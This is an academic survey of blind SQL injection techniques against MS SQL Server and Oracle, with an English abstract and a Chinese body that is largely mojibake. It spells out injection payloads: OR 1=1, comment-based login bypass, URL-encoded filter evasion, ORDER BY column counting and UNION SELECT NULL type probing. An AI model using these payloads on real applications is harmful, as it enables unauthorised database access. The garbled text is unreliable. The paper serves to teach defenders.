SQLäע
Javaphile SQLäע 1SQLäע
coolswallow of Javaphile (coolswallow@shaolin.org.cn)
Blind SQL Injection Techniques: A Survey
Abstract: This paper gives a survey of current Blind SQL Injection Techniques. It first introduces the definition of SQL Injection and its risk, and reviews several solutions proposed to solve the problem and their each disadvantages. Then, the paper discusses that if detailed error messages are suppressed, how to identify SQL Injections based on minimal reaction of the server, and how to identify SQL Injection vulnerable parameters, to generate valid injection syntax and to build the required exploit. At last, an injection of UNION SELECT statements is described in detail, including how to count the columns and how to identify columns types. Although the provided examples in the paper refer to Microsoft SQL Server and Oracle only, the same techniques can be applied to other Databases as well. By the paper, we hope to make it clear that application level vulnerabilities must be handled by application level solutions, and that relying on suppressed error messages for protection from SQL Injection is eventually useless.
Key words: SQL Injection; Blind Injection; Database Attack; Web Application Security
ժ Ҫ: ĶĿǰSQLע빥ʹõäעȽͨSQLע뼼ĶΣع˼ѱSQLעķֶμԵȱ㣬ȻڴϢλε̽SQLע©ǷķСӦԼȷעȷȷע䷨ô롣ĻUNION SELECTΪϸøäעͳݱже͵ķͲ衣иӶMicrosoft SQL ServerOracleģͬļҲԱӦõݿϵͳĵĿȷӦó©ֻͨӦóķܽδϢرSQLע빥ġ
ؼ: SQLע룻äעݿӦóȫ
1
1.1 ͨSQLע뼼
ĿǰûжSQLע뼼ı壬йĴ2
(1) űעʽĹ
(2) ûӰ챻ִеSQLű
Chris AnleyĶ, һͨڲѯвһϵеSQLд뵽ӦóУַͿԶSQLע롣Stephen KostֹʽһһݿδȨķʺֱӼSQLע빥䱾ʶԣõĹSQLԵӦó̹߱е©ܹݣӦóвһЩSQLʱSQLע빥ͷˡʵϣSQLעǴڳĶӵӦóһ©ͨӦóԤȶõIJѯβ϶SQLԪأƭݿִзȨѯӦóһӦó(Web Application)ûѯѯǶSQL
coolswallow:SQL äע 2
У͵ӦóݿȥִСͨһЩε룬ܹȥȡԤδ֪Ľ
ڷշ棬SQLע빥λǰеģ뻺©൱Ҫʵʩ߱ƹվķǽSQLע빥ڷǽΪʹûܷӦóInternetWebӣһӦóע©߾ͿֱӷݿܹݿڵķķȨijЩ£SQLע빥ķҪ©
SQLע빥õSQLʹֹй㷺ԡ˵лSQLԱݿSQL ServerOracleMySQL, DB2InformixԼ֮ӵӦóActive/Java Server Pages, Cold Fusion Management, PHPPerlȶЧġȻص㣬ʵʵĹܲͬSQLע빥ԭԼҸݿϵͳӦó㷺ʹãע©÷ĹҲɽSQLע빥һֱע빥ʽҲбõơ
MS SQL ServerͨSQLע뼼ϸܣԲοChris AnleyġSQL ServerӦóеĸSQLע롱һĺĸSQLע롱Cesar CerrundoġSQLעMicrosoft SQL Server һģԼSPIʵҵKevin SpettдİƤ顰SQLע C ӦóǷܹ OracleͨSQLע뼼ܣԲοStephen KostġOracleԱSQLע빥顱һġ
1.2 SQLע빥ķֶ
ԽԽĹSQLע뼼Ҳ֮˺ܶͼע©ķĿǰķУ
(1) ڷʽ֮ǰύݵĺϷԽм飻
(2) װͻύϢ
(3) 滻ɾַ/ַ
(4) γϢ
(1)ĽȷϿͻ˵Ϸ֮ǰ˾ܾйؼԵĴҪܹһְȫķʽӦóȻдӦóΰȫطݿĵ棬Ȼкܶȱ㹻İȫʶɿIJƷɴע©(2)ҪRDBMS֧֣ĿǰֻOracleøü(3)һֲȫĽʩ磬ͻ˵Ϊccmdmcmddʱ,ڶַcmd滻ɾԺʣµַǡcmd(4)ĿǰõķܶలȫĵΪSQLע빥ҪͨϢռϢЩijЩȱϸĴϢɣʹܶలȫרγһֹע빥ȱϸ²ʵʩ
ʵϣδϢڷ˴֮вȣʵѾֻͼֹ֪ĽѡSQLäעһЩʹõ¼ڴϢεʹܻϢʵʩע빥
1.3 ĵĽṹ֯
ΪäעȽȷSQLע©ķСӦΣǽһϺSQLԽ֮滻κЧSQLǽûϸϢUNION SELECT䡣۵äעڹǰӦóݿ͡ṹȵϢһ֪ЩϢҪעĹͨ̽á
coolswallow:SQL äע 3
2 ȷע©
ҪSQLע빥ȵȻȷҪӦóע©˹ȱȷһЩĴصʾܴ͡ϢѱΣӦóȻȷʹֻҪѧϰȥʶЩʾѰشȷǷSQLء
2.1 ʶ
һӦóҪ͵ĴһWebĴ쳣(exception)ڡ500:Internal Server ErrorͨSQLעδպϵţͻʹ׳쳣ҪθһýĬϵĴϢ滻һȶƵHTMLҳ棬ֻҪ۲쵽Ӧ֣ͿȷʵǷ˷£Ϊ˽һθЩһ쳣תҳǰһʹҳ棬 ʾһĴϢṩκϸڡ
ڶӦóģ俪нϺõıϰߡӦóǵܻһЩЧֱΪ֮һضĴϢܳһ᷵һЧӦ(200 OK)ҳȻתҳ棬߲ijϢİ취ڡInternal Server Error
ΪִǿһӣӦóABӦóʹͬһproddetails.aspҳ棬ҳڴһProdIDȡòݿȡӦIJƷϸϢݣȻԷصĽһЩӦóͨһƷбҳϵӵproddetails.aspܱ֤ProdIDһֱǴЧġӦóAΪͲ⣬˶Բļ飬ߴ۸ProdIDһݱвڵidݿͻ᷵һռ¼ӦóAûϵֿܻռ¼ͼȥü¼еʱͿܻ쳣һ500:Internal Server ErrorӦóBڶԼ¼дǰȷϼ¼ĴС0ǿռ¼һʾòƷڡ߿ΪظôὫҳ¶λƷбҳ档
˹Ϊ˽SQLäעȳύһЩЧ۲ӦóδЩԼSQLᷢʲô
2.2 λ
ҪӦó˳ʶͼλΪĴϢʱ߾ͻʹñSQLעԼһЩSQLؼ֣ORANDȣһЩMETAַ;ȣÿһؽвԣõӦжǷ˴ͨһش(intercepting proxy)ƵĹ߿ԷʶҳתһЩԤشκһشIJпܴSQLע©ڵÿУ뱣֤ЧģΪҪעκܵԭµĴӰжϽԵĽһһɲббеһЩܵȷԽעãһЩһЩSQLصĴɣҪ߽ҪЩѡע©IJdz֮Ϊȷע㡣
2.3 ȷע
SQLֶοԱΪҪַͣ֡ڡȻÿͶص㣬ȴעĹءÿһӦóύSQLѯIJеһֱֲ࣬ύַҪŲűύ磺
SELECT * FROM Products WHERE ProdID = 4
coolswallow:SQL äע 4
SELECT * FROM Products WHERE ProdName = 'Book'
SQLܵʲô͵IJʽֻҪñʽصͼɡصʹܹȷһǷSQLءͣĴ취ʹû
/mysite/proddetails.asp?ProdID=4
Ըòһְ취Dz4Ϊһʹ3+1ΪֱӱύSQL䣬γSQL䣺
(1) SELECT * FROM Products WHERE ProdID = 4'
(2) SELECT * FROM Products WHERE ProdID = 3 + 1
һSQL⣬һһڶ˳ִУغProdID4һIJƷϢʾòǴע©ġ
ƵļԱӦһSQLַʽ滻ò𣺵һַʾʽǷеģҪţڶͬSQLַͬMS SQL Serverʹ÷+ַOracleʹ÷||ᡣ
/mysite/proddetails.asp?ProdName=Book
ҪԸProdNameǷע©滻һЧַBookȻ滻һȷַıʽB+ookOracleB||ookͻγSQL䣺
(1) SELECT * FROM Products WHERE ProdName = 'Book''
(2) SELECT * FROM Products WHERE ProdID = 'B' + 'ook'
һȻܲһSQLڶܷغһֵΪBookIJƷ
עʹӦóѾˡ+METAַȻʱַתURL루ַASCII16ƣƹ飬磺
/mysite/proddetails.asp?ProdID=3+1͵/mysite/proddetails.asp?ProdID=3%2B1
/mysite/proddetails.asp?ProdID=B+ook͵/mysite/proddetails.asp?ProdID=B%27%2B%27ook
Ƶģκαʽ滻IJϵͳҲԱύԷһ֣һַһڣOraclesysdateһڱʽSQL ServerУgetdate()᷵ڱʽļͬԱжǷSQLע©
ͨϽܿԷ֣ʹûϸĴϢڹ˵жǷSQLע©Ȼһdz
3 ʵʩע빥
ȷעҪԽעãҪȷSQLעʽжϳ̨ݿͣȻô롣
3.1 ȷȷע䷨
SQLäעҲмɵIJ裬SQLܼôȷȷעҲףSQLϸӣôҪͻƾҪεijԣЩҪĻȴǷdz
ȷľ䷨Ĺ̼ͨSELECT WHERE䣬עIJע㣩WHEREһ֡Ϊȷȷע䷨ܹ߱WHEREݣʹܷطԤڵĽһЩӦóOR 1=1Ϳɣڴ빹ɹô룬ȻDzġҪԲţparenthesis
coolswallow:SQL äע 5
ɶԵţʹ֮ǰʹõķţƥ䡣ⳣһ۸ĵܻᵼӦóںһSQL֣Ӧóһֻܴһ¼OR 1=1ʹݿⷵ1000¼ʱͻWHERE䱾һͨORANDֵΪTRUEFALSEıʽҪȷȷע䷨ؼܷɹͻƲƲ˳ؽ䣬Ҫжϲԡ磬AND 1=2ܽʽֵΪFALSEOR 1=2ʽֵӰ죨Dzȼ
һЩעãıWHERE㹻ˣUNION SELECTע洢̣stored proceduresע룬Ҫ˳ؽSQL䣬ȻҪSQL䡣£߿ѡʹSQLעͷ䣬÷ۺţ--ҪSQL Serverͬһе롣磬һ¼ҳҪû룬ύSQL䣺
SELECT Username, UserID, Password FROM Users WHERE Username = user AND Password = pass
ͨjohn--ΪûṹWHERE䣺
WHERE Username = john --'AND Password = pass
ʱ䲻SQLһʹû֤һWHERE䣺
WHERE (Username = user AND Password = pass)
ע˲ţʱʹjohn--Ϊûͻ
WHERE (Username = john' --' AND Password = pass)
ΪδԵIJţͲᱻִС
ʾʹעͷܹжǷ˳ؽˣעͷûвζעͷǰѾ˳ر˴Ҫ߽иԡ
3.2 жݿ
һȷȷע䷨ͻῪʼעȥжϺ̨ݿͣȷע䷨Ҫöࡣһʹ¼ּɣЩǻڲͬݿھʵϵIJ졣ֻOracleMS SQL Server
İ취ǰᵽַţע䷨Ѿȷ£߿ԶWHEREɵӶıʽôͿַıȽݿ⣬磺
AND 'xxx' = 'x' + 'xx' AND %27xxx%27+%3D+%27x%27+%2B+%27xx%27
ͨ+滻||ͿжϳݿOracleMS SQL Server͡
İ취÷ַֺSQLУֺSQLͬһСעʱҲעʹ÷ֺţOracleȴʹ÷ֺšǰʹעͷʱûгִôעͷǰϷֺŶMS SQL ServerûӰģOracleͻ⣬ʹCOMMITȷǷڷֺźִ(磬עxxx' ; COMMIT --)ûгִͿΪִС
ʽԱ滻ܷȷֵϵͳڲͬ͵ݿʹõϵͳҲDzͬģҲͨʹϵͳȷݿͣ2.3ᵽMS SQL Serverںgetdate()Oraclesysdate.
3.3 עô
صϢѻú߾ͿԿʼעãڹעôҲҪϸĴϢô뱾ԲοSQLע빥ĵ
coolswallow:SQL äע 6
ڶͨSQLעãѾкܶĽϸۣʱֻһڽһUNION SELECTע롣
4 UNION SELECTע
ͨ۸SELECTWHEREעںܶӦódzЧäע£ȻԸʹUNION SELECT䣬ΪWHEREеIJͬʹUNION SELECTùûдϢȻܷݿб
UNION SELECTעҪԤȻ֪ݿıеֶθͣЩϢһ㱻ΪûϸϢʾDzܻõģͽķ
ҪעǣUNION SELECTǰǹѾȷȷע䷨ĵǰһѾäעǿʵֵģʹUNION SELECT֮ǰSQLеIJŶӦѾԣӶɵʹUNIONָע롣UNION SELECTҪǰѯϢͬͬͣȻͻ
4.1 ͳ
ϢûбʱҪȡֻҪڽUNION SELECTעʱÿγʹòֶͬɣϢɡƥ䡱ɡеͲƥ䡱ʱǰԵȷġäע£ǶϤϢĸԸ÷Ҳʧȥá
µİ취ORDER BY䣬SELECTORDER BYܹı䷵صļ¼Ĵһǰһֵָ磬ͨƷŲѯƷʱһЧע£
SELECT ProdNum FROM Products WHERE (ProdID=1234) ORDER BY ProdNum --
AND ProdName=Computer) AND UserName=john
ԵORDER BYʹָProdNumDzѯصļ¼еĵһУע1234) ORDER BY 1--صĽһġѯֻһֶΣע1234) ORDER BY 2 --ͻصļ¼ָĵڶֶORDER BYͿԱͳˡÿSELECT䶼ٷһֶΣʹ߿ע䷨ORDER BY 1ȷǷܱȷִУʱֶεҲܻʱӹؼASCDESCԽ⡣һȷORDER BY䷨Чģ߾ͻкŴ1100бߵ1000ֱкűȷΪЧϵֵһʱǰһкžҪͳƵʵУЩֶοܲôڳֵһδʱٶೢһ֣ȷкѱꡣ
4.2 же
ͳҪжеͣäעжҲмɵģUNION SELECTҪǰѯѯֶֶͬޣԼUNION SELECTֶͽб(brute force)ֶ϶࣬жϾͻ⡣ǰģֶεַֻֿ֡ܵͣһֶ10ôζ310Լ60000ֿܵϣÿһԶ20γԣһҲҪһСʱֶ࣬ôʱͻܡ
һּİ취SQLĹؼNULL뾲ֶ̬εעҪͻַͲͬNULLƥκһ͡˿עһвѯֶζΪNULLUNION SELECT䣬ôͲκͲƥĴپһǰƵӣ
SELECT ProdNum,ProdType,ProdPrice,ProdProvider FROM Products
WHERE (ProdID=1234 AND ProdName= Computer) AND UserName=john
coolswallow:SQL äע 7
蹥ѾڸΪ4ôͿԺܼعһUNION SELECT䣬вѯֶζΪNULLҪһȨFROM䡣MS SQL ServerʹFROMҲOracleʹһdualıҪһֵһΪFALSEWHERE䣨WHERE 1=2Ϊȷѯֻ᷵nullֵļ¼ԶžܵĴôMS SQL Serverע£
SELECT ProdNum,ProdType,ProdPrice,ProdProvider FROM Products
WHERE (ProdID=1234) UNION SELECT NULL,NULL,NULL,NULL
WHERE 1=2 -- AND ProdName= Computer) AND UserName=john
NULLעĿģҪĿǹһκδUNION SELECTԲUNIONǷԱִУһĿΪ˶ݿ͵жϽ100%ȷϣͨFROMһݿԤõıвԣ
NULLע䱻˳ִУôͿԿٵضÿеͽжϡÿһֳУֻһֶͽвԣֻ࣬ÿֶ౻ξͻнԵĴ3ΪΪָĴProdNumֶͣζַͣô˳עͿжϳȷͣ
. 1234) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 --
C ䷨ȷʹõMS SQL Serverݿ
. 1234) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 --
C һֶ
. 1234) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --
C ڶֶβ
. 1234) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --
C ڶֶַ
. 1234) UNION SELECT 1,2,3,NULL WHERE 1=2 --
C ֶβ
. 1234) UNION SELECT 1,2,3,NULL WHERE 1=2 --
C ֶַ
. 1234) UNION SELECT 1,2,3,4 WHERE 1=2 --
C ĸֶβ
. 1234) UNION SELECT 1,2,3,4 WHERE 1=2 --
C ĸֶַ
ھѾÿһеͣäעԱӦڴݿıлȡݣݱбԼǸԵԴӦóлݣЩһЩSQLעѾۣʱIJټܡ
5 ܽ
ĿǰSQLäעļչڴϢʹε£SQLע©ȻԱáʹѾȡ˺ܶʩغηظûϢʹñĽܵļܶӦóȻԱעáͱӦó©ԷĻһЩĶDzܹģӦóĿԱİȫʶ֣ǿԴ밲ȫԵĿƣڷʽ֮ǰÿύIJкϷԼ飬ԴӸϽע⡣
coolswallow:SQL äע 8
References:
Microsoft China Technology Center, SQL Server ȫع, http://www.microsoft.com/china/ctc/Newsletter/04/ctc2.htm, 2004.
Anley, C., Advanced SQL Injection In SQL Server Applications, http://www.ngssoftware.com/papers/advanced_sql_injection.pdf, An NGSSoftware Insight Security Research (NISR) Publication, 2002
Kost S., Introduction to SQL Injection Attacks for Oracle Developers, .Integrigy Corporation, http://www.net-security.org/dl/articles/IntegrigyIntrotoSQLInjectionAttacks.pdf, 2004.
Anley, C., (more) Advanced SQL Injection, http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf, An NGSSoftware Insight Security Research (NISR) Publication, 2002
Cerrudo, C., Manipulating Microsoft SQL Server Using SQL Injection, 2002 http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf.
Spett, K., SQL Injection - Are your web applications vulnerable?, 2002 http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf
ҳ:
[1]